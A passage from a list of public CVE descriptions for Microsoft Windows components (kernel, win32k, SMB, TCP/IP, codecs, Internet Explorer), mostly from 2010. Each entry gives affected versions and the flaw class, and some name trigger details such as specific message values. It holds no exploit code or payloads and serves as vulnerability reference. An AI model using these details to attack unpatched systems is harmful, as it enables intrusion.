Vulnerability." [CVE-2010-1893] Integer overflow in the TCP/IP stack in Microsoft Windows Vista SP1, Windows Server 2008 Gold and R2, and Windows 7 allows local users to gain privileges via a buffer of user-mode data that is copied to kernel mode, aka "Integer Overflow in Windows Networking Vulnerability." [CVE-2010-1892] The TCP/IP stack in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle malformed IPv6 packets, which allows remote attackers to cause a denial of service (system hang) via multiple crafted packets, aka "IPv6 Memory Corruption Vulnerability." [CVE-2010-1891] The Client/Server Runtime Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2, when a Chinese, Japanese, or Korean locale is enabled, does not properly allocate memory for transactions, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Elevation of Privilege Vulnerability." [CVE-2010-1890] The kernel in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate ACLs on kernel objects, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Improper Validation Vulnerability." [CVE-2010-1889] Double free vulnerability in the kernel in Microsoft Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2, allows local users to gain privileges via a crafted application, related to object initialization during error handling, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-1888] Race condition in the kernel in Microsoft Windows XP SP3 allows local users to gain privileges via vectors involving thread creation, aka "Windows Kernel Data Initialization Vulnerability." [CVE-2010-1887] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Win32k Bounds Checking Vulnerability." [CVE-2010-1886] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 SP2 and R2, and Windows 7 allow local users to gain privileges by leveraging access to a process with NetworkService credentials, as demonstrated by TAPI Server, SQL Server, and IIS processes, and related to the Windows Service Isolation feature. NOTE: the vendor states that privilege escalation from NetworkService to LocalSystem does not cross a "security boundary." [CVE-2010-1885] The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability." [CVE-2010-1883] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted table in an embedded font, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2010-1882] Multiple buffer overflows in the MPEG Layer-3 Audio Codec for Microsoft DirectShow in l3codecx.ax in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote attackers to execute arbitrary code via an MPEG Layer-3 audio stream in (1) a crafted media file or (2) crafted streaming content, aka "MPEG Layer-3 Audio Decoder Buffer Overflow Vulnerability." [CVE-2010-1880] Unspecified vulnerability in Quartz.dll for DirectShow on Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1, and Server 2008 allows remote attackers to execute arbitrary code via a media file with crafted compression data, aka "MJPEG Media Decompression Vulnerability." [CVE-2010-1735] The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1734] The SfnINSTRING function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x18d value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1690] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 does not verify that transaction IDs of responses match transaction IDs of queries, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1689] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 uses predictable transaction IDs that are formed by incrementing a previous ID by 1, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1264] Unspecified vulnerability in Microsoft Windows SharePoint Services 3.0 SP1 and SP2 allows remote attackers to cause a denial of service (hang) via crafted requests to the Help page that cause repeated restarts of the application pool, aka "Sharepoint Help Page Denial of Service Vulnerability." [CVE-2010-1263] Windows Shell and WordPad in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 [CVE-2010-1255] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 allows local users to execute arbitrary code via vectors related to "glyph outline information" and TrueType fonts, aka "Win32k TrueType Font Parsing Vulnerability." [CVE-2010-1225] The memory-management implementation in the Virtual Machine Monitor (aka VMM or hypervisor) in Microsoft Virtual PC 2007 Gold and SP1, Virtual Server 2005 Gold and R2 SP1, and Windows Virtual PC does not properly restrict access from the guest OS to memory locations in the VMM work area, which allows context-dependent attackers to bypass certain anti-exploitation protection mechanisms on the guest OS via crafted input to a vulnerable application. NOTE: the vendor reportedly found that only systems with an otherwise vulnerable application are affected, because "the memory areas accessible from the guest cannot be leveraged to achieve either remote code execution or elevation of privilege and ... no data from the host is exposed to the guest OS." [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-1118] Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1117] Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1098] The ANI parser in Microsoft Windows before 7 on the x86 platform, as used in Internet Explorer and other applications, allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted biClrUsed value in the BITMAPINFO header of a .ANI file. [CVE-2010-1042] Microsoft Windows Media Player 11 does not properly perform colorspace conversion, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .AVI file. NOTE: the provenance of this information is unknown [CVE-2010-0917] Stack-based buffer overflow in VBScript in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, might allow user-assisted remote attackers to execute arbitrary code via a long string in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution when the F1 key is pressed, a different vulnerability than CVE-2010-0483. [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2010-0819] Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability." [CVE-2010-0818] The MPEG-4 codec in the Windows Media codecs in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly handle crafted media content with MPEG-4 video encoding, which allows remote attackers to execute arbitrary code via a file in an unspecified "supported format," aka "MPEG-4 Codec Vulnerability." [CVE-2010-0812] Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to bypass intended IPv4 source-address restrictions via a mismatched IPv6 source address in a tunneled ISATAP packet, aka "ISATAP IPv6 Source Address Spoofing Vulnerability." [CVE-2010-0811] Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability." [CVE-2010-0810] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, does not properly handle unspecified exceptions, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability." [CVE-2010-0805] The Tabular Data Control (TDC) ActiveX control in Microsoft Internet Explorer 5.01 SP4, 6 on Windows XP SP2 and SP3, and 6 SP1 allows remote attackers to execute arbitrary code via a long URL (DataURL parameter) that triggers memory corruption in the CTDCCtl::SecurityCHeckDataURL function, aka "Memory Corruption Vulnerability." [CVE-2010-0719] An unspecified API in Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 does not validate arguments, which allows local users to cause a denial of service (system crash) via a crafted application. [CVE-2010-0718] Buffer overflow in Microsoft Windows Media Player 9 and 11.0.5721.5145 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted .mpg file. [CVE-2010-0487] The Authenticode Signature verification functionality in cabview.dll in Cabinet File Viewer Shell Extension 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows remote attackers to execute arbitrary code via a modified cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "Cabview Corruption Validation Vulnerability." [CVE-2010-0486] The WinVerifyTrust function in Authenticode Signature Verification 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows user-assisted remote attackers to execute arbitrary code via a modified (1) Portable Executable (PE) or (2) cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2010-0485] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 "do not properly validate all callback parameters when creating a new window," which allows local users to execute arbitrary code, aka "Win32k Window Creation Vulnerability." [CVE-2010-0484] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 "do not properly validate changes in certain kernel objects," which allows local users to execute arbitrary code via vectors related to Device Contexts (DC) and the GetDCEx function, aka "Win32k Improper Data Validation Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0482] The kernel in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate relocation sections of image files, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Malformed Image Vulnerability." [CVE-2010-0481] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly translate a registry key's virtual path to its real path, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Virtual Path Parsing Vulnerability." [CVE-2010-0480] Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability." [CVE-2010-0478] Stack-based buffer overflow in nsum.exe in the Windows Media Unicast Service in Media Services for Microsoft Windows 2000 Server SP4 allows remote attackers to execute arbitrary code via crafted packets associated with transport information, aka "Media Services Stack-based Buffer Overflow Vulnerability." [CVE-2010-0477] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly handle (1) SMBv1 and (2) SMBv2 response packets, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted packet that causes the client to read the entirety of the response, and then improperly interact with the Winsock Kernel (WSK), aka "SMB Client Message Size Vulnerability." [CVE-2010-0476] The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability." [CVE-2010-0379] Multiple unspecified vulnerabilities in the Macromedia Flash ActiveX control in Adobe Flash Player 6, as distributed in Microsoft Windows XP SP2 and SP3, might allow remote attackers to execute arbitrary code via unspecified vectors that are not related to the use-after-free "Movie Unloading Vulnerability" (CVE-2010-0378). NOTE: due to lack of details, it is not clear whether this overlaps any other CVE item. [CVE-2010-0378] Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a "Movie Unloading Vulnerability." [CVE-2010-0278] A certain ActiveX control in msgsc.14.0.8089.726.dll in Microsoft Windows Live Messenger 2009 build 14.0.8089.726 on Windows Vista and Windows 7 allows remote attackers to cause a denial of service (msnmsgr.exe crash) by calling the ViewProfile method with a crafted argument during an MSN Messenger session. [CVE-2010-0270] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate fields in SMB transaction responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Transaction Vulnerability." [CVE-2010-0269] The SMB client in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for SMB responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Memory Allocation Vulnerability." [CVE-2010-0268] Unspecified vulnerability in the Windows Media Player ActiveX control in Windows Media Player (WMP) 9 on Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted media content, aka "Media Player Remote Code Execution Vulnerability." [CVE-2010-0265] Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka "Movie Maker and Producer Buffer Overflow Vulnerability." [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0250] Heap-based buffer overflow in DirectShow in Microsoft DirectX, as used in the AVI Filter on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2, and in Quartz on Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, allows remote attackers to execute arbitrary code via an AVI file with a crafted length field in an unspecified video stream, which is not properly handled by the RLE video decompressor, aka "DirectShow Heap Overflow Vulnerability." [CVE-2010-0249] Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4 [CVE-2010-0242] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to cause a denial of service (system hang) via crafted packets with malformed TCP selective acknowledgement (SACK) values, aka "TCP/IP Selective Acknowledgement Vulnerability." [CVE-2010-0241] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Route Information packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Route Information Vulnerability." [CVE-2010-0240] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when a custom network driver is used, does not properly handle local fragmentation of Encapsulating Security Payload (ESP) over UDP packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "Header MDL Fragmentation Vulnerability." [CVE-2010-0239] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability." [CVE-2010-0238] Unspecified vulnerability in registry-key validation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Registry Key Vulnerability." [CVE-2010-0237] The kernel in Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows local users to gain privileges by creating a symbolic link from an untrusted registry hive to a trusted registry hive, aka "Windows Kernel Symbolic Link Creation Vulnerability." [CVE-2010-0236] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not properly allocate memory for the destination key associated with a symbolic-link registry key, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Allocation Vulnerability." [CVE-2010-0235] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not perform the expected validation before creating a symbolic link, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Symbolic Link Value Vulnerability." [CVE-2010-0234] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate a registry-key argument to an unspecified system call, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Null Pointer Vulnerability." [CVE-2010-0233] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-0232] The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0231] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not use a sufficient source of entropy, which allows remote attackers to obtain access to files and other SMB resources via a large number of authentication requests, related to server-generated challenges, certain "duplicate values," and spoofing of an authentication token, aka "SMB NTLM Authentication Lack of Entropy Vulnerability." [CVE-2010-0035] The Key Distribution Center (KDC) in Kerberos in Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2, when a trust relationship with a non-Windows Kerberos realm exists, allows remote authenticated users to cause a denial of service (NULL pointer dereference and domain controller outage) via a crafted Ticket Granting Ticket (TGT) renewal request, aka "Kerberos Null Pointer Dereference Vulnerability." [CVE-2010-0028] Integer overflow in Microsoft Paint in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted JPEG (.JPG) file, aka "MS Paint Integer Overflow Vulnerability." [CVE-2010-0027] The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability." [CVE-2010-0026] The Hyper-V server implementation in Microsoft Windows Server 2008 Gold, SP2, and R2 on the x64 platform allows guest OS users to cause a denial of service (host OS hang) via a crafted application that executes a malformed series of machine instructions, aka "Hyper-V Instruction Set Validation Vulnerability." [CVE-2010-0025] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2000 SP3, does not properly allocate memory for SMTP command replies, which allows remote attackers to read fragments of e-mail messages by sending a series of invalid commands and then sending a STARTTLS command, aka "SMTP Memory Allocation Vulnerability." [CVE-2010-0024] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2003 SP2, does not properly parse MX records, which allows remote DNS servers to cause a denial of service (service outage) via a crafted response to a DNS MX record query, aka "SMTP Server MX Record Vulnerability." [CVE-2010-0023] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2010-0022] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate the share and servername fields in SMB packets, which allows remote attackers to cause a denial of service (system hang) via a crafted packet, aka "SMB Null Pointer Vulnerability." [CVE-2010-0021] Multiple race conditions in the SMB implementation in the Server service in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allow remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 Negotiate packet, aka "SMB Memory Corruption Vulnerability." [CVE-2010-0020] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate request fields, which allows remote authenticated users to execute arbitrary code via a malformed request, aka "SMB Pathname Overflow Vulnerability." [CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability." [CVE-2010-0018] Integer overflow in the Embedded OpenType (EOT) Font Engine (t2embed.dll) in Microsoft Windows 2000 SP4 [CVE-2010-0017] Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka "SMB Client Race Condition Vulnerability." [CVE-2010-0016] The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted response, aka "SMB Client Pool Corruption Vulnerability." [CVE-2009-4313] ir32_32.dll 3.24.15.3 in the Indeo32 codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (heap corruption) or execute arbitrary code via malformed data in a stream in a media file, as demonstrated by an AVI file. [CVE-2009-4312] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Dave Lenoe of Adobe. [CVE-2009-4311] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Paul Byrne of NGS Software. NOTE: this might overlap CVE-2008-3615. [CVE-2009-4310] Stack-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted compressed video data in an IV41 stream in a media file, leading to many loop iterations, as demonstrated by data in an AVI file. [CVE-2009-4309] Heap-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a large size value in a movi record in an IV41 stream in a media file, as demonstrated by an AVI file. [CVE-2009-4210] The Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted media content. [CVE-2009-3678] Integer overflow in cdd.dll in the Canonical Display Driver (CDD) in Microsoft Windows Server 2008 R2 and Windows 7 on 64-bit platforms, when the Windows Aero theme is installed, allows context-dependent attackers to cause a denial of service (reboot) or possibly execute arbitrary code via a crafted image file that triggers incorrect data parsing after user-mode data is copied to kernel mode, as demonstrated using "Browse with Irfanview" and certain actions on a folder containing a large number of thumbnail images in Resample mode, possibly related to the ATI graphics driver or win32k.sys, aka "Canonical Display Driver Integer Overflow Vulnerability." [CVE-2009-3677] The Internet Authentication Service (IAS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly verify the credentials in an MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication request, which allows remote attackers to access network resources via a malformed request, aka "MS-CHAP Authentication Bypass Vulnerability." [CVE-2009-3676] The SMB client in the kernel in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to cause a denial of service (infinite loop and system hang) via a (1) SMBv1 or (2) SMBv2 response packet that contains (a) an incorrect length value in a NetBIOS header or (b) an additional length field at the end of this response packet, aka "SMB Client Incomplete Response Vulnerability." [CVE-2009-3675] LSASS.exe in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote authenticated users to cause a denial of service (CPU consumption) via a malformed ISAKMP request over IPsec, aka "Local Security Authority Subsystem Service Resource Exhaustion Vulnerability." [CVE-2009-3294] The popen API function in TSRM/tsrm_win32.c in PHP before 5.2.11 and 5.3.x before 5.3.1, when running on certain Windows operating systems, allows context-dependent attackers to cause a denial of service (crash) via a crafted (1) "e" or (2) "er" string in the second argument (aka mode), possibly related to the _fdopen function in the Microsoft C runtime library. NOTE: this might not cross privilege boundaries except in rare cases in which the mode argument is accessible to an attacker outside of an application that uses the popen function. [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3103] Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a 